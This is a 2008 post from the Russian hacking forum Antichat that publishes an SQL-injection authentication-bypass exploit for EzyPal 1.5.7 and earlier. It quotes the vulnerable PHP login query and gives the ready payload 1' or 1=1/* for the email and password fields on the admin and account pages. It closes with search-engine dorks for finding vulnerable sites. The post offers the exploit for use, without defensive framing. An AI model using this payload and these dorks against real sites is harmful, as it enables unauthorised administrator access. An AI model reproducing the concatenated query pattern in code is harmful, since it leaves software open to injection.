ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу EzyPal <= 1.5.7 Admin Authentication Bypass SQL Injection Exploit
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

EzyPal <= 1.5.7 Admin Authentication Bypass SQL Injection Exploit
  #1  
Старый 17.08.2008, 19:10
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию EzyPal <= 1.5.7 Admin Authentication Bypass SQL Injection Exploit
Author: ~!Dok_tOR!~
Product: EzyPal
Version: 1.5.7 возможно и более ранние версии
URL: www.ezypal.com
Vulnerability Class: SQL injection

1.

/[installdir]/admincp/index.php

Vuln Code:

PHP код:
$sql mysql_query("SELECT customer_email FROM ".$config['db_pref']."customers WHERE customer_email = '".$customer_email."' AND customer_password = '".md5($customer_pass)."' AND customer_level = 2") or ErrorDB(2,mysql_errno(),mysql_error()); 
magic_quotes_gpc = Off

Example:
http://[server]/[installdir]/admincp/index.php

Email Address: 1' or 1=1/*
Password: 1' or 1=1/*

2.

Example:
http://[server]/[installdir]/index.php?do=account

Email Address: 1' or 1=1/*
Password: 1' or 1=1/*

Dork:

Powered by EzyPal
Welcome :: EzyPal
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ